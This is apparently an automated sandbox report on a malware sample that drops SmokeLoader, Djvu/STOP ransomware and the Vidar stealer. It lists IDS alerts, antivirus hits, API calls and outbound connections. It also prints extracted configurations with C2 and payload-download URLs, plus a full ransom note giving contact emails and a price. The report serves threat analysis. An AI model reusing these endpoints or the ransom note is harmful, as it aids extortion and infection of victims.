            Timestamp:05/25/24-21:29:27.244515
            SID:2039103
            Source Port:49741
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:37.086113
            SID:2039103
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:58.049560
            SID:2039103
            Source Port:49780
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:49.866228
            SID:2039103
            Source Port:49767
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:03.404543
            SID:2019714
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:Potentially Bad Traffic
            Timestamp:05/25/24-21:29:39.561780
            SID:2039103
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:02.640033
            SID:2039103
            Source Port:49788
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:41.129515
            SID:2039103
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:30:30.914264
            SID:2039103
            Source Port:49810
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/25/24-21:29:24.807766
            SID:2039103
            Source Port:49738
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: file.exeAvira: detected
            Source: https://api.2ip.ua/geo.json.Avira URL Cloud: Label: malware
            Source: http://cajgtus.com/files/1/build3.exe?Avira URL Cloud: Label: malware
            Source: https://api.2ip.ua/geo.jsonJAvira URL Cloud: Label: malware
            Source: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeAvira: detection malicious, Label: TR/AD.MalwareCrypter.rddpg
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeAvira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeAvira: detection malicious, Label: TR/AD.MalwareCrypter.rddpg
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exeAvira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeAvira: detection malicious, Label: HEUR/AGEN.1311176
            Source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "4b617f18efba315ca20e874e36c04827", "Version": "9.8"}
            Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
            Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E
            Source: sdfjhuz.comVirustotal: Detection: 22%Perma Link
            Source: cajgtus.comVirustotal: Detection: 23%Perma Link
            Source: transfer.adttemp.com.brVirustotal: Detection: 8%Perma Link
            Source: nessotechbd.comVirustotal: Detection: 18%Perma Link
            Source: trad-einmyus.comVirustotal: Detection: 16%Perma Link
            Source: api.2ip.uaVirustotal: Detection: 6%Perma Link
            Source: https://65.109.242.59/dVirustotal: Detection: 6%Perma Link
            Source: https://65.109.242.59/rVirustotal: Detection: 6%Perma Link
            Source: https://65.109.242.59/tographyVirustotal: Detection: 6%Perma Link
            Source: https://65.109.242.59/.Virustotal: Detection: 7%Perma Link
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeReversingLabs: Detection: 81%
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeReversingLabs: Detection: 86%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeReversingLabs: Detection: 81%
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exeReversingLabs: Detection: 86%
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeReversingLabs: Detection: 86%
            Source: C:\Users\user\AppData\Roaming\rujtcguReversingLabs: Detection: 31%
            Source: file.exeReversingLabs: Detection: 31%
            Source: file.exeVirustotal: Detection: 43%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeJoe Sandbox ML: detected
            Source: file.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00411178 CryptDestroyHash,CryptReleaseContext,10_2_00411178
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,10_2_0040E870
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040EA51 CryptDestroyHash,CryptReleaseContext,10_2_0040EA51
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,10_2_0040EAA0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040EC68 CryptDestroyHash,CryptReleaseContext,10_2_0040EC68
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,10_2_00410FC0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,15_2_0040E870
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,15_2_0040EAA0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,15_2_00410FC0
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00411178 CryptDestroyHash,CryptReleaseContext,15_2_00411178
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040EA51 CryptDestroyHash,CryptReleaseContext,15_2_0040EA51
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040EC68 CryptDestroyHash,CryptReleaseContext,15_2_0040EC68
            Source: E609.exe, 0000000F.00000002.2883282984.000000000310E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_b49521e8-f

            Compliance

            barindex
            Source: C:\Users\user\AppData\Local\Temp\E609.exeUnpacked PE file: 10.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\E609.exeUnpacked PE file: 15.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 17.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeUnpacked PE file: 19.2.build2.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 27.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exeUnpacked PE file: 28.2.build3.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeUnpacked PE file: 33.2.E609.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeUnpacked PE file: 35.2.mstsca.exe.400000.0.unpack
            Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\_readme.txtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\E609.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeFile created: C:\_readme.txt
            Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exeFile created: C:\Users\user\_readme.txt
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.4:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49762 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49765 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49773 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49803 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49812 version: TLS 1.2
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
            Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
            Source: Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,10_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,10_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 10_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,10_2_0040FB98
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,15_2_0040F730
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_00410160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,15_2_00410160
            Source: C:\Users\user\AppData\Local\Temp\E609.exeCode function: 15_2_0040FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,15_2_0040FB98
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
            Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

            Networking

            barindex
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49736 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49737 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49738 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49739 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49740 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49741 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49742 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49743 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49745 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49747 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49748 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49749 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49750 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49752 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49753 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49754 -> 189.163.126.89:80
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49754 -> 189.163.126.89:80
            Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49757 -> 213.172.74.157:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49759 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49760 -> 213.172.74.157:80
            Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49760 -> 213.172.74.157:80
            Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 213.172.74.157:80 -> 192.168.2.4:49757
            Source: TrafficSnort IDS: 2036335 ET TROJAN Win32/Filecoder.STOP Variant Public Key Download 213.172.74.157:80 -> 192.168.2.4:49758
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49761 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49763 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49764 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49766 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49767 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49769 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49770 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49774 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49775 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49777 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49778 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49780 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49782 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49784 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49787 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49788 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2019714 ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile 192.168.2.4:49789 -> 91.92.253.69:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49797 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49802 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49805 -> 158.160.165.129:80
            Source: TrafficSnort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.4:49810 -> 158.160.165.129:80
            Source: C:\Windows\explorer.exeNetwork Connect: 189.163.126.89 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 103.174.152.66 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 193.233.132.167 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 91.92.253.69 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 185.154.13.143 80Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 192.185.16.114 443Jump to behavior
            Source: C:\Windows\explorer.exeNetwork Connect: 158.160.165.129 80Jump to behavior
